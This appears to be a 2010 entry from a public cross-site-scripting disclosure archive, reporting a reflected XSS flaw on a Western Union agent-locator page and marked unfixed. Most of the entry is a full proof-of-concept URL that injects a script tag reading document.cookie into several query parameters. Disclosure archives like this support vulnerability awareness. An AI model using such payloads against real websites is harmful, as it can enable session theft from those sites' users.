Security researcher Sony, has submitted on 30/12/2010 a cross-site-scripting (XSS) vulnerability affecting local.westernunion.com, which at the time of submission ranked 4507 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 03/01/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 30/12/2010 |
Date published: 03/01/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: Sony |
Domain: local.westernunion.com |
Category: XSS |
Pagerank: 4507 |
URL: http://local.westernunion.com/locator/RNewSSearchAction.do?today=0&today=0&searchCustom__searchBy=na me&searchCustom__numResults=10&mapAndList=mapAndList&frompg=results&searchType=newsearch&searchCusto m__SearchType=newsearch&searchCustom__AgntStreet1=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript %3E&searchCustom__city=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&searchCustom__state=&se archCustom__MoneyTransfer=false&searchCustom__ConvPay=false&searchCustom__BillPay=false&searchCustom __BillPayOpt=false&searchCustom__QuickColl=false&searchCustom__PrePaid=false&searchCustom__moneyorde r=false&searchCustom__gocash=false&searchCustom__mobilemoneytransfer=false&searchCustom__country=BEL &street1=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&city=%3Cscript%3Ealert%28document.coo kie%29%3C%2Fscript%3E&postalCode=334454&searchCustom__agentName=%3Cscript%3Ealert%28document.cookie% 29%3C%2Fscript%3E |
Click here to view the mirror
|
|
|